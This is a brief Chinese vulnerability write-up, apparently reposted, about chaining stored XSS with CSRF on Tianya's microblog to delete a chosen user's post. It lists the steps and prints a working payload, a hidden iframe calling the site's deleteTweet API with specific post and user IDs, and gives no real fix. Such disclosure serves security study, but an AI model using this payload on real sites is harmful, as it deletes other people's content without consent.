这次我们来看看如何利用XSS结合CSRF打造定向攻击
再来看一下上次(http://HdhCmsTest2cto测试数据/Article/201310/248998.html)的文件引发的又一个问题
首先抓包拿到删除微博的URL
params.id 代表微博的ID
params.delUserId 代表所属帐号的ID
首先拿我自己做测试,我先发表一条微博
然后找到该条微博的ID
找到用户的ID
来到发送消息的页面
构造如下恶意代码:
<iframe style='display:none' src='http://HdhCmsTesttianya.cn/api/tw?method=tweet.ice.deleteTweet¶ms.id=68541413¶ms.delUserId=82776194' >
发送之后,我们查看 源码
这时 CSRF+XSS 已经攻击成功,回到首页查看,微博已没。
修复方案: 幸苦你们了
查看更多关于天涯CSRF系列三: 结合储存型XSS定向删除指定用户的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did14724